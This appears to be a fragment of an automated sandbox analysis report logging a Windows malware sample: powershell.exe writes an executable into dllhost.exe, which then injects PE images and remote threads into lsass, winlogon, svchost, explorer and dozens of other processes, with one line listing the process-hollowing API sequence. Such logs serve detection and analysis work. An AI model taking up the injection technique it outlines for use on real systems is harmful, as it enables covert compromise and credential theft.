            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,68_2_0000000140002434
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612AC0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC612AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0AB2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 612D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AEDD2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992AC0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D532AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 67D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B392AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBFD2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59042AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A9E72AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 73162AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E862AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 473C2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F9D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83BC2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D3F72AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4152AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BDF32AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0262AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9F32AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 644B2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B2A2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F62AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB42AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ADB2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1992AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25DA2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F5352AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0D62AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FFB2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C2572AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BCE2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66942AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13EF2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5DA72AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 199D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B82AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29D02AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3402AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC692AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78972AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0A2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 64522AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DA2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 52342AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DA92AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0F2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B7F42AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 55FD2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C7042AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4202208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23B2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 48072AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 90502AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7F5C2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 111D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2572208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D62208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2932208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D02208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2752208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F32208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28B2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 942208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2332208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26C2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27D2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25D2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2922208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2392208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2742208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B52208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2552208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F32208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D72208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2602208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2502208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2822208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2512208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2222208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D92208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13A2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 722208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D62208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AA2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E72208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E02208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CB2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 882208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A62208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CD2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 692208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2842208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E32208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A22208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C32208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 912208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23A2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2312208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29C2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A72208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1502208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2902208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BB2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25D2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2132208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E52208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2612208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13B2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A22208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2362208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29C2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 20C2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13E2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15B2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12D2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FE2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1482208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BC2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F52208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EF2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F72208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CB2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 902208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26E2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 972208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 722208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 672208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D72208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2972208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2302208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 842208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FD2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2092208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2202208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A22208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A22208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E02208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26C2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6442AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 89942AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CB472AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9702AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9732AC0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19E29D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 3400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2538D0F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 194B7F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 27555FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 2DFC7040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 4200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 29A023B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1A648070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E990500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1887F5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 219111D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 28B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 26C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 5D0000 value starts with: 4D5A
